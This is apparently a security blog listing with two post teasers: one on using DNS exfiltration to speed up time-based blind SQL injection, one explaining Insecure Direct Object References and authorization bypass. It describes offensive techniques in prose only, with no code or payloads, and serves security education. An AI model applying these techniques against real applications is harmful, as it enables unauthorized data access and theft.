Hello everyone, in this post we are going to use DNS for data ex-filtration to fasten (time based) blind sql injection attacks or make exploitation possible even on random delayed networks/applications. So let us start with basics of DNS.
As you know, nowadays web applications could be as complex as operating systems. Most of those complexity comes from authorisation schemas. Such weaknesses are referred to in the literature as Insecure Direct Object Reference.
Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources in the system directly, for example database records or files. (more…)